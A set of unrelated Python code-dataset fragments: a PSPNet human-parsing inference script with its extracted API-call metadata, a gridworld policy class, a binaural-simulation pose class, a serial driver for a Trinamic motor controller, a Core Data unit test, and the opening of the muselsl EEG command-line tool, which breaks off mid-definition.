'Face', 'Left-arm', 'Right-arm', 'Left-leg',
'Right-leg', 'Left-shoe', 'Right-shoe',))
colormap = [(0, 0, 0),
(1, 0.25, 0), (0, 0.25, 0), (0.5, 0, 0.25), (1, 1, 1),
(1, 0.75, 0), (0, 0, 0.5), (0.5, 0.25, 0), (0.75, 0, 0.25),
(1, 0, 0.25), (0, 0.5, 0), (0.5, 0.5, 0), (0.25, 0, 0.5),
(1, 0, 0.75), (0, 0.5, 0.5), (0.25, 0.5, 0.5), (1, 0, 0),
(1, 0.25, 0), (0, 0.75, 0), (0.5, 0.75, 0), ]
cmap = matplotlib.colors.ListedColormap(colormap)
bounds = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
norm = matplotlib.colors.BoundaryNorm(bounds, cmap.N)
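    # Illustrative note (not in the original source): with these 21 boundaries
    # and the 20-entry colormap above, BoundaryNorm maps a predicted label k
    # (0-19) onto colormap[k], so each body-part class keeps a fixed color.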
h, w, _ = pred.shape
def denormalize(img, mean, std):
c, _, _ = img.shape
for idx in range(c):
img[idx, :, :] = img[idx, :, :] * std[idx] + mean[idx]
return img
img = denormalize(img.cpu().numpy(), [0.485, 0.456, 0.406], [
0.229, 0.224, 0.225])
img = img.transpose(1, 2, 0).reshape((h, w, 3))
pred = pred.reshape((h, w))
# show image
ax0.set_title('img')
ax0.imshow(img)
ax1.set_title('pred')
mappable = ax1.imshow(pred, cmap=cmap, norm=norm)
# colorbar legend
cbar = plt.colorbar(mappable, ax=axes, shrink=0.7, )
cbar.ax.get_yaxis().set_ticks([])
for j, lab in enumerate(classes):
cbar.ax.text(2.3, (j + 0.45) / 20.0, lab, ha='left', va='center', )
plt.savefig(fname="./result.jpg")
print('result saved to ./result.jpg')
plt.show()
def main():
# --------------- model --------------- #
snapshot = os.path.join(args.models_path, args.backend, 'PSPNet_last')
net, starting_epoch = build_network(snapshot, args.backend)
net.eval()
# ------------ load image ------------ #
data_transform = get_transform()
imgfolder = 'ACGPN/ACGPN_testdata/test_img/'
savefolder = 'ACGPN/ACGPN_testdata/test_humanparse/'
if not os.path.exists(savefolder):
os.mkdir(savefolder)
imglist = os.listdir(imgfolder)
for imgname in tqdm.tqdm(imglist):
imgpath = os.path.join(imgfolder, imgname)
print(imgpath)
img = Image.open(imgpath)
img = data_transform(img)
if torch.cuda.is_available():
img = img.cuda()
with torch.no_grad():
pred, _ = net(img.unsqueeze(dim=0))
pred = pred.squeeze(dim=0)
pred = pred.cpu().numpy().transpose(1, 2, 0)
pred = np.asarray(np.argmax(pred, axis=2),
dtype=np.uint8).reshape((256, 192, 1))
pred_3 = np.repeat(pred, 3, axis = 2)
savepath = os.path.join(savefolder, imgname)
cv2.imwrite(savepath, pred_3)
if __name__ == '__main__':
main()
| [
"numpy.array",
"torch.cuda.is_available",
"os.path.exists",
"os.listdir",
"numpy.repeat",
"argparse.ArgumentParser",
"matplotlib.colors.ListedColormap",
"os.mkdir",
"torchvision.transforms.ToTensor",
"matplotlib.pyplot.savefig",
"numpy.argmax",
"torchvision.transforms.Normalize",
"torchvision.transforms.Compose",
"matplotlib.pyplot.show",
"torch.device",
"cv2.imwrite",
"PIL.Image.open",
"matplotlib.pyplot.colorbar",
"os.path.join",
"torch.nn.DataParallel",
"tqdm.tqdm",
"os.path.basename",
"net.pspnet.PSPNet",
"torch.no_grad",
"matplotlib.colors.BoundaryNorm",
"matplotlib.pyplot.subplots"
]
| [((1113, 1181), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Pyramid Scene Parsing Network"""'}), "(description='Pyramid Scene Parsing Network')\n", (1136, 1181), False, 'import argparse\n'), ((1679, 1699), 'torch.nn.DataParallel', 'nn.DataParallel', (['net'], {}), '(net)\n', (1694, 1699), True, 'import torch.nn as nn\n'), ((2051, 2076), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (2074, 2076), False, 'import torch\n'), ((2345, 2385), 'torchvision.transforms.Compose', 'transforms.Compose', (['transform_image_list'], {}), '(transform_image_list)\n', (2363, 2385), False, 'from torchvision import transforms\n'), ((2431, 2449), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(2)'], {}), '(1, 2)\n', (2443, 2449), True, 'import matplotlib.pyplot as plt\n'), ((2621, 2862), 'numpy.array', 'np.array', (["('Background', 'Hat', 'Hair', 'Glove', 'Sunglasses', 'UpperClothes',\n 'Dress', 'Coat', 'Socks', 'Pants', 'Jumpsuits', 'Scarf', 'Skirt',\n 'Face', 'Left-arm', 'Right-arm', 'Left-leg', 'Right-leg', 'Left-shoe',\n 'Right-shoe')"], {}), "(('Background', 'Hat', 'Hair', 'Glove', 'Sunglasses',\n 'UpperClothes', 'Dress', 'Coat', 'Socks', 'Pants', 'Jumpsuits', 'Scarf',\n 'Skirt', 'Face', 'Left-arm', 'Right-arm', 'Left-leg', 'Right-leg',\n 'Left-shoe', 'Right-shoe'))\n", (2629, 2862), True, 'import numpy as np\n'), ((3385, 3427), 'matplotlib.colors.ListedColormap', 'matplotlib.colors.ListedColormap', (['colormap'], {}), '(colormap)\n', (3417, 3427), False, 'import matplotlib\n'), ((3541, 3587), 'matplotlib.colors.BoundaryNorm', 'matplotlib.colors.BoundaryNorm', (['bounds', 'cmap.N'], {}), '(bounds, cmap.N)\n', (3571, 3587), False, 'import matplotlib\n'), ((4166, 4209), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['mappable'], {'ax': 'axes', 'shrink': '(0.7)'}), '(mappable, ax=axes, shrink=0.7)\n', (4178, 4209), True, 'import matplotlib.pyplot as plt\n'), ((4369, 4402), 'matplotlib.pyplot.savefig', 'plt.savefig', ([], {'fname': '"""./result.jpg"""'}), "(fname='./result.jpg')\n", (4380, 4402), True, 'import matplotlib.pyplot as plt\n'), ((4449, 4459), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4457, 4459), True, 'import matplotlib.pyplot as plt\n'), ((4535, 4594), 'os.path.join', 'os.path.join', (['args.models_path', 'args.backend', '"""PSPNet_last"""'], {}), "(args.models_path, args.backend, 'PSPNet_last')\n", (4547, 4594), False, 'import os\n'), ((4945, 4966), 'os.listdir', 'os.listdir', (['imgfolder'], {}), '(imgfolder)\n', (4955, 4966), False, 'import os\n'), ((4986, 5004), 'tqdm.tqdm', 'tqdm.tqdm', (['imglist'], {}), '(imglist)\n', (4995, 5004), False, 'import tqdm\n'), ((343, 434), 'net.pspnet.PSPNet', 'PSPNet', ([], {'sizes': '(1, 2, 3, 6)', 'psp_size': '(512)', 'deep_features_size': '(256)', 'backend': '"""squeezenet"""'}), "(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend=\n 'squeezenet')\n", (349, 434), False, 'from net.pspnet import PSPNet\n'), ((455, 545), 'net.pspnet.PSPNet', 'PSPNet', ([], {'sizes': '(1, 2, 3, 6)', 'psp_size': '(1024)', 'deep_features_size': '(512)', 'backend': '"""densenet"""'}), "(sizes=(1, 2, 3, 6), psp_size=1024, deep_features_size=512, backend=\n 'densenet')\n", (461, 545), False, 'from net.pspnet import PSPNet\n'), ((566, 655), 'net.pspnet.PSPNet', 'PSPNet', ([], {'sizes': '(1, 2, 3, 6)', 'psp_size': '(512)', 'deep_features_size': '(256)', 'backend': '"""resnet18"""'}), "(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend=\n 'resnet18')\n", (572, 655), 
False, 'from net.pspnet import PSPNet\n'), ((676, 765), 'net.pspnet.PSPNet', 'PSPNet', ([], {'sizes': '(1, 2, 3, 6)', 'psp_size': '(512)', 'deep_features_size': '(256)', 'backend': '"""resnet34"""'}), "(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend=\n 'resnet34')\n", (682, 765), False, 'from net.pspnet import PSPNet\n'), ((786, 877), 'net.pspnet.PSPNet', 'PSPNet', ([], {'sizes': '(1, 2, 3, 6)', 'psp_size': '(2048)', 'deep_features_size': '(1024)', 'backend': '"""resnet50"""'}), "(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend=\n 'resnet50')\n", (792, 877), False, 'from net.pspnet import PSPNet\n'), ((899, 991), 'net.pspnet.PSPNet', 'PSPNet', ([], {'sizes': '(1, 2, 3, 6)', 'psp_size': '(2048)', 'deep_features_size': '(1024)', 'backend': '"""resnet101"""'}), "(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend=\n 'resnet101')\n", (905, 991), False, 'from net.pspnet import PSPNet\n'), ((1013, 1105), 'net.pspnet.PSPNet', 'PSPNet', ([], {'sizes': '(1, 2, 3, 6)', 'psp_size': '(2048)', 'deep_features_size': '(1024)', 'backend': '"""resnet152"""'}), "(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend=\n 'resnet152')\n", (1019, 1105), False, 'from net.pspnet import PSPNet\n'), ((2229, 2250), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (2248, 2250), False, 'from torchvision import transforms\n'), ((2260, 2326), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (2280, 2326), False, 'from torchvision import transforms\n'), ((4874, 4900), 'os.path.exists', 'os.path.exists', (['savefolder'], {}), '(savefolder)\n', (4888, 4900), False, 'import os\n'), ((4910, 4930), 'os.mkdir', 'os.mkdir', (['savefolder'], {}), '(savefolder)\n', (4918, 4930), False, 'import os\n'), ((5024, 5056), 'os.path.join', 'os.path.join', (['imgfolder', 'imgname'], {}), '(imgfolder, imgname)\n', (5036, 5056), False, 'import os\n'), ((5094, 5113), 'PIL.Image.open', 'Image.open', (['imgpath'], {}), '(imgpath)\n', (5104, 5113), False, 'from PIL import Image\n'), ((5159, 5184), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (5182, 5184), False, 'import torch\n'), ((5229, 5244), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (5242, 5244), False, 'import torch\n'), ((5546, 5572), 'numpy.repeat', 'np.repeat', (['pred', '(3)'], {'axis': '(2)'}), '(pred, 3, axis=2)\n', (5555, 5572), True, 'import numpy as np\n'), ((5599, 5632), 'os.path.join', 'os.path.join', (['savefolder', 'imgname'], {}), '(savefolder, imgname)\n', (5611, 5632), False, 'import os\n'), ((5645, 5674), 'cv2.imwrite', 'cv2.imwrite', (['savepath', 'pred_3'], {}), '(savepath, pred_3)\n', (5656, 5674), False, 'import cv2\n'), ((1748, 1774), 'os.path.basename', 'os.path.basename', (['snapshot'], {}), '(snapshot)\n', (1764, 1774), False, 'import os\n'), ((1924, 1943), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (1936, 1943), False, 'import torch\n'), ((5420, 5443), 'numpy.argmax', 'np.argmax', (['pred'], {'axis': '(2)'}), '(pred, axis=2)\n', (5429, 5443), True, 'import numpy as np\n')] |
from src.gridworld_mdp import GridWorld
class EquiprobableRandomPolicy:
def __init__(self):
self.world_model = GridWorld()
def get_prob(self, selected_action, state):
assert state in self.world_model.states
assert selected_action in self.world_model.actions
num_all_possible_actions = 0
times_selected_action_chosen = 0
for next_state in self.world_model.states:
for action in self.world_model.actions:
if self.world_model.reward_fn(state, action, next_state) == -1:
num_all_possible_actions += 1
if action == selected_action:
times_selected_action_chosen += 1
if not num_all_possible_actions:
return 0
prob = times_selected_action_chosen / num_all_possible_actions
return prob
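# Illustrative note (not part of the original source): if a state admits four
# (action, next_state) pairs with reward -1 and the selected action accounts
# for exactly one of them, get_prob returns 0.25 -- an equiprobable random policy.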
| [
"src.gridworld_mdp.GridWorld"
]
| [((125, 136), 'src.gridworld_mdp.GridWorld', 'GridWorld', ([], {}), '()\n', (134, 136), False, 'from src.gridworld_mdp import GridWorld\n')] |
import logging
from collections import namedtuple
logger = logging.getLogger("pybinsim.Pose")
class Orientation(namedtuple('Orientation', ['yaw', 'pitch', 'roll'])):
pass
class Position(namedtuple('Position', ['x', 'y', 'z'])):
pass
class Custom(namedtuple('CustomValues', ['a', 'b', 'c'])):
pass
class Pose:
def __init__(self, orientation, position, custom=Custom(0, 0, 0)):
self.orientation = orientation
self.position = position
self.custom = custom
def create_key(self):
value_list = list(self.orientation) + list(self.position) + list(self.custom)
return ','.join([str(x) for x in value_list])
@staticmethod
def from_filterValueList(filter_value_list):
# 'old' format: orientation - position
if len(filter_value_list) == 6:
orientation = Orientation(filter_value_list[0], filter_value_list[1], filter_value_list[2])
position = Position(filter_value_list[3], filter_value_list[4], filter_value_list[5])
return Pose(orientation, position)
# 'new' format: orientation - position - custom
if len(filter_value_list) == 9:
orientation = Orientation(filter_value_list[0], filter_value_list[1], filter_value_list[2])
position = Position(filter_value_list[3], filter_value_list[4], filter_value_list[5])
custom = Custom(filter_value_list[6], filter_value_list[7], filter_value_list[8])
return Pose(orientation, position, custom)
raise RuntimeError("Unable to parse filter list: {}".format(filter_value_list))
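# Illustrative usage (values are made up, not from the original source):
#   Pose.from_filterValueList([10, 0, 0, 1.0, 2.0, 0.5])           # yaw/pitch/roll + x/y/z
#   Pose.from_filterValueList([10, 0, 0, 1.0, 2.0, 0.5, 1, 2, 3])  # ... plus custom a/b/c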
| [
"logging.getLogger",
"collections.namedtuple"
]
| [((60, 94), 'logging.getLogger', 'logging.getLogger', (['"""pybinsim.Pose"""'], {}), "('pybinsim.Pose')\n", (77, 94), False, 'import logging\n'), ((115, 166), 'collections.namedtuple', 'namedtuple', (['"""Orientation"""', "['yaw', 'pitch', 'roll']"], {}), "('Orientation', ['yaw', 'pitch', 'roll'])\n", (125, 166), False, 'from collections import namedtuple\n'), ((195, 234), 'collections.namedtuple', 'namedtuple', (['"""Position"""', "['x', 'y', 'z']"], {}), "('Position', ['x', 'y', 'z'])\n", (205, 234), False, 'from collections import namedtuple\n'), ((261, 304), 'collections.namedtuple', 'namedtuple', (['"""CustomValues"""', "['a', 'b', 'c']"], {}), "('CustomValues', ['a', 'b', 'c'])\n", (271, 304), False, 'from collections import namedtuple\n')] |
from __future__ import print_function
"""
Low-level serial communication for Trinamic TMCM-140-42-SE controller
(used internally for the Thorlabs MFC1)
"""
import serial, struct, time, collections
try:
# this is nicer because it provides deadlock debugging information
from acq4.util.Mutex import RecursiveMutex as RLock
except ImportError:
from threading import RLock
try:
from ..SerialDevice import SerialDevice, TimeoutError, DataError
except ValueError:
## relative imports not allowed when running from command prompt, so
## we adjust sys.path when running the script for testing
if __name__ == '__main__':
import sys, os
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from SerialDevice import SerialDevice, TimeoutError, DataError
def threadsafe(method):
# decorator for automatic mutex lock/unlock
def lockMutex(self, *args, **kwds):
with self.lock:
return method(self, *args, **kwds)
return lockMutex
COMMANDS = {
'rol': 2,
'ror': 1,
'mvp': 4,
'mst': 3,
'rfs': 13,
'sco': 30,
'cco': 32,
'gco': 31,
'sap': 5,
'gap': 6,
'stap': 7,
'rsap': 8,
'sgp': 9,
'ggp': 10,
'stgp': 11,
'rsgp': 12,
'sio': 14,
'gio': 15,
'calc': 19,
'comp': 20,
'jc': 21,
'ja': 22,
'csub': 23,
'rsub': 24,
'wait': 27,
'stop': 28,
'calcx': 33,
'aap': 34,
'agp': 35,
'aco': 39,
'sac': 29,
'stop_application': 128,
'run_application': 129,
'step_application': 130,
'reset_application': 131,
'start_download': 132,
'stop_download': 133,
'get_application_status': 135,
'get_firmware_version': 136,
'restore_factory_settings': 137,
}
PARAMETERS = { # negative values indicate read-only parameters
'target_position': 0,
'actual_position': 1,
'target_speed': 2,
'actual_speed': 3,
'maximum_speed': 4,
'maximum_acceleration': 5,
'maximum_current': 6,
'standby_current': 7,
'target_pos_reached': 8,
'ref_switch_status': 9,
'right_limit_switch_status': 10,
'left_limit_switch_status': 11,
'right_limit_switch_disable': 12,
'left_limit_switch_disable': 13,
'minimum_speed': -130,
'acceleration': -135,
'ramp_mode': 138,
'microstep_resolution': 140,
'soft_stop_flag': 149,
'ramp_divisor': 153,
'pulse_divisor': 154,
'referencing_mode': 193,
'referencing_search_speed': 194,
'referencing_switch_speed': 195,
'distance_end_switches': 196,
'mixed_decay_threshold': 203,
'freewheeling': 204,
'stall_detection_threshold': 205,
'actual_load_value': 206,
'driver_error_flags': -208,
'encoder_position': 209,
'encoder_prescaler': 210,
'fullstep_threshold': 211,
'maximum_encoder_deviation': 212,
'power_down_delay': 214,
'absolute_encoder_value': -215,
}
GLOBAL_PARAMETERS = {
'eeprom_magic': 64,
'baud_rate': 65,
'serial_address': 66,
'ascii_mode': 67,
'eeprom_lock': 73,
'auto_start_mode': 77,
'tmcl_code_protection': 81,
'coordinate_storage': 84,
'tmcl_application_status': 128,
'download_mode': 129,
'tmcl_program_counter': 130,
'tick_timer': 132,
'random_number': -133,
}
OPERATORS = {
'add': 0,
'sub': 1,
'mul': 2,
'div': 3,
'mod': 4,
'and': 5,
'or': 6,
'xor': 7,
'not': 8,
'load': 9,
'swap': 10,
}
CONDITIONS = {
'ze': 0,
'nz': 1,
'eq': 2,
'ne': 3,
'gt': 4,
'ge': 5,
'lt': 6,
'le': 7,
'eto': 8,
'eal': 9,
'esd': 12,
}
STATUS = {
1: "Wrong checksum",
2: "Invalid command",
3: "Wrong type",
4: "Invalid value",
5: "Configuration EEPROM locked",
6: "Command not available",
}
class TMCMError(Exception):
def __init__(self, status):
self.status = status
msg = STATUS[status]
Exception.__init__(self, msg)
class TMCM140(SerialDevice):
def __init__(self, port, baudrate=9600, module_addr=1):
"""
port: serial COM port (eg. COM3 or /dev/ttyACM0)
baudrate: 9600 by default
module_addr: 1 by default
"""
self.lock = RLock(debug=True)
self.port = port
assert isinstance(module_addr, int)
assert module_addr > 0
self.module_addr = module_addr
self.module_str = chr(module_addr+64)
self._waiting_for_reply = False
SerialDevice.__init__(self, port=self.port, baudrate=baudrate)
@threadsafe
def command(self, cmd, type, motor, value):
"""Send a command to the controller and return the reply.
If an error is returned from the controller then raise an exception.
"""
self._send_cmd(cmd, type, motor, value)
return self._get_reply()
def rotate(self, velocity):
"""Begin rotating motor.
velocity: -2047 to +2047
negative values turn left; positive values turn right.
"""
assert isinstance(velocity, int)
assert -2047 <= velocity <= 2047
if velocity < 0:
direction = 'l'
velocity = -velocity
else:
direction = 'r'
self.command('ro'+direction, 0, 0, velocity)
def stop(self):
"""Stop the motor.
Note: does not stop currently running programs.
"""
self.command('mst', 0, 0, 0)
def move(self, pos, relative=False, velocity=None):
"""Rotate until reaching *pos*.
pos: The target position
relative: If True, then *pos* is interpreted as relative to the current
position
velocity: Optionally set the target velocity before moving
"""
assert isinstance(pos, int)
assert -2**32 <= pos < 2**32
if velocity is not None:
assert isinstance(velocity, int)
assert 0 <= velocity < 2048
raise NotImplementedError()
type = 1 if relative else 0
self.command('mvp', type, 0, pos)
def get_param(self, param):
pnum = abs(PARAMETERS[param])
return self.command('gap', pnum, 0, 0)[4]
def __getitem__(self, param):
return self.get_param(param)
def set_param(self, param, value, **kwds):
"""Set a parameter value.
        If value is 'accum' then the parameter is set from the accumulator
register.
"""
pnum = PARAMETERS[param]
if pnum < 0:
raise TypeError("Parameter %s is read-only." % param)
if pnum in (PARAMETERS['maximum_current'], PARAMETERS['standby_current']) and value > 100:
if kwds.get('force', False) is not True:
raise Exception("Refusing to set current > 100 (this can damage the motor). "
"To override, use force=True.")
if value == 'accum':
self.command('aap', pnum, 0, 0)
else:
self.command('sap', pnum, 0, value)
@threadsafe
def set_params(self, **kwds):
"""Set multiple parameters.
The driver is thread-locked until all parameters are set.
"""
for param, value in kwds.items():
self.set_param(param, value)
def __setitem__(self, param, value):
return self.set_param(param, value)
def get_global(self, param):
"""Return a global parameter or copy global to accumulator.
Use param='gpX' to refer to general-purpose variables.
"""
if param.startswith('gp'):
pnum = int(param[2:])
bank = 2
else:
pnum = abs(GLOBAL_PARAMETERS[param])
bank = 0
return self.command('ggp', pnum, bank, 0)[4]
def set_global(self, param, value):
if param.startswith('gp'):
pnum = int(param[2:])
bank = 2
else:
pnum = GLOBAL_PARAMETERS[param]
bank = 0
if pnum < 0:
raise TypeError("Parameter %s is read-only." % param)
if value == 'accum':
self.command('agp', pnum, bank, 0)
else:
self.command('sgp', pnum, bank, value)
def stop_program(self):
"""Stop the currently running TMCL program.
"""
self.command('stop_application', 0, 0, 0)
def start_program(self, address=None):
"""Start running TMCL program code from the given address (in bytes?),
or from the current address if None.
"""
if address is None:
self.command('run_application', 0, 0, 0)
else:
self.command('run_application', 1, 0, address)
def start_download(self, address=0):
"""Begin loading TMCL commands into EEPROM .
"""
self.command('start_download', 0, 0, address)
def stop_download(self):
"""Finish loading TMCL commands into EEPROM.
"""
self.command('stop_download', 0, 0, 0)
def write_program(self, address=0):
return ProgramManager(self, address)
def program_status(self):
"""Return current program status:
0=stop, 1=run, 2=step, 3=reset
"""
return self.command('get_application_status', 0, 0, 0)[4]
def calc(self, op, value):
opnum = OPERATORS[op]
if opnum > 9:
raise TypeError("Operator %s invalid for calc" % op)
self.command('calc', opnum, 0, value)
def calcx(self, op):
opnum = OPERATORS[op]
self.command('calcx', opnum, 0, 0)
def comp(self, val):
self.command('comp', 0, 0, val)
def jump(self, *args):
"""Program jump to *addr* (instruction index).
Usage:
jump(address)
jump(cond, address)
Where *cond* may be ze, nz, eq, ne, gt, ge, lt, le, eto, eal, or esd.
"""
if len(args) == 1:
assert isinstance(args[0], int)
self.command('ja', 0, 0, args[0])
else:
cnum = CONDITIONS[args[0]]
self.command('jc', cnum, 0, args[1])
def _send_cmd(self, cmd, type, motor, value):
"""Send a command to the controller.
"""
if self._waiting_for_reply:
raise Exception("Cannot send command; previous reply has not been "
"received yet.")
cmd_num = COMMANDS[cmd]
assert isinstance(type, int)
assert isinstance(motor, int)
# Try packing the value first as unsigned, then signed. (the overlapping
# integer ranges have identical bit representation, so there is no
# ambiguity)
try:
cmd = struct.pack('>BBBBI', self.module_addr, cmd_num, type, motor, value)
except struct.error:
cmd = struct.pack('>BBBBi', self.module_addr, cmd_num, type, motor, value)
chksum = sum(bytearray(cmd)) % 256
out = cmd + struct.pack('B', chksum)
self.write(out)
self._waiting_for_reply = True
def _get_reply(self):
"""Read and parse a reply from the controller.
Raise an exception if an error was reported.
"""
if not self._waiting_for_reply:
raise Exception("No reply expected.")
try:
d = self.read(9)
finally:
self._waiting_for_reply = False
d2 = self.readAll()
if len(d2) > 0:
raise Exception("Error: extra data while reading reply.")
parts = struct.unpack('>BBBBiB', d)
reply_addr, module_addr, status, cmd_num, value, chksum = parts
if chksum != sum(bytearray(d[:-1])) % 256:
raise Exception("Invalid checksum reading from controller.")
if status < 100:
raise TMCMError(status)
return parts
class ProgramManager(object):
def __init__(self, mcm, start=0):
self.mcm = mcm
self.start = start
self.count = 0
def __enter__(self):
self.mcm.lock.acquire()
self.mcm.start_download(self.start)
return self
def __exit__(self, *args):
# insert an extra stop to ensure the program can't leak
# into previously written code.
self.mcm.command('stop', 0, 0, 0)
self.mcm.stop_download()
self.mcm.lock.release()
def __getattr__(self, name):
self.count += 1
return getattr(self.mcm, name)
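if __name__ == '__main__':
    # Minimal usage sketch (assumptions: the serial port name and the parameter
    # values below are illustrative only -- adjust them for the actual hardware).
    import time
    mcm = TMCM140(port='/dev/ttyACM0', baudrate=9600, module_addr=1)
    mcm.set_param('maximum_current', 50)  # stay well below 100 to protect the motor
    mcm.rotate(500)                       # spin right at a moderate speed
    time.sleep(1.0)
    mcm.stop()
    print("load value:", mcm['actual_load_value'])
    # write_program() returns a ProgramManager; commands issued inside the with-block
    # are stored in EEPROM (download mode) instead of being executed immediately.
    with mcm.write_program() as prog:
        prog.rotate(200)
    mcm.start_program()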
| [
"threading.RLock",
"struct.pack",
"os.path.dirname",
"struct.unpack",
"SerialDevice.SerialDevice.__init__"
]
| [((4354, 4371), 'threading.RLock', 'RLock', ([], {'debug': '(True)'}), '(debug=True)\n', (4359, 4371), False, 'from threading import RLock\n'), ((4605, 4667), 'SerialDevice.SerialDevice.__init__', 'SerialDevice.__init__', (['self'], {'port': 'self.port', 'baudrate': 'baudrate'}), '(self, port=self.port, baudrate=baudrate)\n', (4626, 4667), False, 'from SerialDevice import SerialDevice, TimeoutError, DataError\n'), ((11907, 11934), 'struct.unpack', 'struct.unpack', (['""">BBBBiB"""', 'd'], {}), "('>BBBBiB', d)\n", (11920, 11934), False, 'import serial, struct, time, collections\n'), ((11044, 11112), 'struct.pack', 'struct.pack', (['""">BBBBI"""', 'self.module_addr', 'cmd_num', 'type', 'motor', 'value'], {}), "('>BBBBI', self.module_addr, cmd_num, type, motor, value)\n", (11055, 11112), False, 'import serial, struct, time, collections\n'), ((11305, 11329), 'struct.pack', 'struct.pack', (['"""B"""', 'chksum'], {}), "('B', chksum)\n", (11316, 11329), False, 'import serial, struct, time, collections\n'), ((11160, 11228), 'struct.pack', 'struct.pack', (['""">BBBBi"""', 'self.module_addr', 'cmd_num', 'type', 'motor', 'value'], {}), "('>BBBBi', self.module_addr, cmd_num, type, motor, value)\n", (11171, 11228), False, 'import serial, struct, time, collections\n'), ((720, 745), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (735, 745), False, 'import sys, os\n')] |
import unittest
from signals.generators.ios.core_data import get_current_version, get_core_data_from_folder
class CoreDataTestCase(unittest.TestCase):
def test_get_current_version(self):
version_name = get_current_version('./tests/files/doubledummy.xcdatamodeld')
self.assertEqual(version_name, 'dummy 2.xcdatamodel')
version_name = get_current_version('./tests/files/dummy.xcdatamodeld')
self.assertEqual(version_name, 'dummy.xcdatamodel')
def test_get_core_data_from_folder(self):
xcdatamodeld_path = './tests/files/doubledummy.xcdatamodeld'
contents_path = xcdatamodeld_path + '/dummy 2.xcdatamodel/contents'
self.assertEqual(get_core_data_from_folder(xcdatamodeld_path), contents_path)
xcdatamodeld_path = './tests/files/dummy.xcdatamodeld'
contents_path = xcdatamodeld_path + '/dummy.xcdatamodel/contents'
self.assertEqual(get_core_data_from_folder(xcdatamodeld_path), contents_path)
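if __name__ == '__main__':
    # Convenience entry point (an assumption, not part of the original module):
    # allows the test case to be run directly with the Python interpreter.
    unittest.main()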
| [
"signals.generators.ios.core_data.get_current_version",
"signals.generators.ios.core_data.get_core_data_from_folder"
]
| [((216, 277), 'signals.generators.ios.core_data.get_current_version', 'get_current_version', (['"""./tests/files/doubledummy.xcdatamodeld"""'], {}), "('./tests/files/doubledummy.xcdatamodeld')\n", (235, 277), False, 'from signals.generators.ios.core_data import get_current_version, get_core_data_from_folder\n'), ((363, 418), 'signals.generators.ios.core_data.get_current_version', 'get_current_version', (['"""./tests/files/dummy.xcdatamodeld"""'], {}), "('./tests/files/dummy.xcdatamodeld')\n", (382, 418), False, 'from signals.generators.ios.core_data import get_current_version, get_core_data_from_folder\n'), ((696, 740), 'signals.generators.ios.core_data.get_core_data_from_folder', 'get_core_data_from_folder', (['xcdatamodeld_path'], {}), '(xcdatamodeld_path)\n', (721, 740), False, 'from signals.generators.ios.core_data import get_current_version, get_core_data_from_folder\n'), ((920, 964), 'signals.generators.ios.core_data.get_core_data_from_folder', 'get_core_data_from_folder', (['xcdatamodeld_path'], {}), '(xcdatamodeld_path)\n', (945, 964), False, 'from signals.generators.ios.core_data import get_current_version, get_core_data_from_folder\n')] |
#!/usr/bin/python
import sys
import argparse
class main:
def __init__(self):
parser = argparse.ArgumentParser(
description='Python package for streaming, recording, and visualizing EEG data from the Muse 2016 headset.',
usage='''muselsl <command> [<args>]
Available commands:
list List available Muse devices.
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
stream Start an LSL stream from Muse headset.
-a --address Device MAC address.
-n --name Device name (e.g. Muse-41D2).
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
view Visualize EEG data from an LSL stream.
-w --window Window length to display in seconds.
-s --scale Scale in uV.
-r --refresh Refresh rate in seconds.
-f --figure Window size.
-v --version Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).
record Record EEG data from an LSL stream.
-d --duration Duration of the recording in seconds.
-f --filename Name of the recording file.
-dj --dejitter Whether to apply dejitter correction to timestamps.
record_direct Record data directly from Muse headset (no LSL).
-a --address Device MAC address.
-n --name Device name (e.g. Muse-41D2).
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
''')
parser.add_argument('command', help='Command to run.')
# parse_args defaults to [1:] for args, but you need to
# exclude the rest of the args too, or validation will fail
args = parser.parse_args(sys.argv[1:2])
if not hasattr(self, args.command):
print('Incorrect usage. See help below.')
parser.print_help()
exit(1)
# use dispatch pattern to invoke method with same name
getattr(self, args.command)()
def list(self):
parser = argparse.ArgumentParser(
description='List available Muse devices.')
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
args = parser.parse_args(sys.argv[2:])
from . import list_muses
list_muses(args.backend, args.interface)
def stream(self):
parser = argparse.ArgumentParser(
description='Start an LSL stream from Muse headset.')
parser.add_argument("-a", "--address",
dest="address", type=str, default=None,
help="Device MAC address.")
parser.add_argument("-n", "--name",
dest="name", type=str, default=None,
help="Name of the device.")
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
